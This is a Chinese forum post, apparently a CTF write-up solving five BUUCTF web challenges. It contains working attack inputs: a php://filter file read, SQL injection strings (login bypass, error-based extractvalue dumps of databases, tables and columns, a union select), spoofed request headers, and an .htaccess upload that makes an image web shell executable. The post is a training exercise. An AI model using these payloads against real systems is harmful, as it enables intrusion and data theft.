ToB企服应用市场:ToB评测及商务社交产业平台

标题: BUUCTF-WEB(9-14) [打印本页]

作者: 缠丝猫    时间: 2024-5-20 21:04
标题: BUUCTF-WEB(9-14)
[极客大挑战 2019]Secret File

打开题目检察源码,找到了一个文件

然后就是一个按钮,点击后,他应该是反应了,但是我们看不到

那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了

然后访问这个网页就是一个源码

这里没有过滤php://filter
  1. ?file=php://filter/read=convert.base64-encode/resource=flag.php
复制代码
base64解密后得到flag

[极客大挑战 2019]LoveSQL

先用全能账号暗码试试,乐成登录
  1. 1'or true#
复制代码

登陆进去没啥用,可能藏在数据库了,这次我们用报错注入,因为我试了,他会有报错语句
爆库名
  1. 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '
复制代码

爆表名
  1. 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '
复制代码

先爆这个love这个表里面的列,毕竟他和题目一样名字
  1. 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '
复制代码

然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)
  1. 1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '
复制代码

然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的
  1. 1' union select 1,2,group_concat(password) from l0ve1ysq1#
复制代码

[极客大挑战 2019]Http

打开题目发现是卖鞋厂,我也是慌了,看看源代码有没有信息吧

找到了,那我们就访问一下

抓包开搞:
说我不是这里来的
  1. Referer:https://Sycsecret.buuoj.cn
复制代码
又提示不是这个欣赏器
  1. User-Agent: Syclover
复制代码
又提示不是当地访问
  1. X-Forwarded-For:127.0.0.1
复制代码
总的请求头就是这个:

拿下flag:

[极客大挑战 2019]Knife


蚁剑直接连接

根目次找到flag

[极客大挑战 2019]Upload

这道题就是我发现可以上传.htaccess文件
所以这里我就抓包上传
  1. <IfModule mime_module>
  2. SetHandler application/x-httpd-php
  3. </IfModule>
复制代码

然后开始上传图片马

这道题过滤了 <strong>




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4